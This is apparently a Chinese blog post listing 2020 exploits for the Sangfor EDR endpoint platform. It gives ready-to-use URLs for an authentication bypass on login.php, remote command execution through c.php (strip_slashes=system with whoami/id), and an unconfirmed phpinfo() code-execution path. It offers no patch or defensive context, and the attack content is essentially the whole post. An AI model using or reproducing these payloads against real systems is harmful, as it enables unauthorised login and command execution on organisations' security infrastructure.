深信服EDR终端检测响应平台漏洞_2020HW

深信服edr 2020HW 0day

远程命令执行漏洞
远程代码执行漏洞
任意用户登陆漏洞

免密码登陆 Payload

使用浏览器访问
https://ip:prot/ui/login.php?user=任意字符

原文链接

远程命令执行

使用浏览器访问
https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoami

https://ip:prot/tool/log/c.php?strip_slashes=system&host=id&path=id&row=id&limit=id

原文链接

远程代码执行

https://ip:prot/tool/php_cli.php?code=phpinfo();
未复现成功

原文链接

乾坤未定,你我皆是黑马

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值